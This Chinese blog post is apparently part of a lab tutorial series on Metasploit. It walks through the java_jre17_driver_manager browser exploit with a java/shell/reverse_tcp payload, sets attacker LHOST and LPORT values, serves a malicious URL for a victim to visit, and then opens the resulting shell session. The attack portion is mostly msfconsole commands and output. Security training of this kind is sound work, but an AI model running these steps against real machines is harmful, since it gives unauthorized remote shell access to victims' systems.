Metasploit实例-java漏洞(八)

2022年10月25日13:58:18 发表评论 125 views

1.1.1 基于java漏洞获取shell

1.1.1.1 生成攻击链接

msf6 > search jre17

Metasploit实例-java漏洞(八)
msf6 > use exploit/multi/browser/java_jre17_driver_manager
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set payload java/shell/reverse_tcp
payload => java/shell/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/browser/java_jre17_driver_manager) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/browser/java_jre17_driver_manager) > exploit  # 会自动在后台运行
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.10.180:4444
[*] Using URL: http://192.168.10.180:8080/efJCThfUK2
[*] Server started.

1.1.1.2 被害主机访问网址

Metasploit实例-java漏洞(八)

Metasploit实例-java漏洞(八)

1.1.1.3 查看获取shell

Metasploit实例-java漏洞(八)

msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions

Metasploit实例-java漏洞(八)
msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions -i 8

Metasploit实例-java漏洞(八)

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang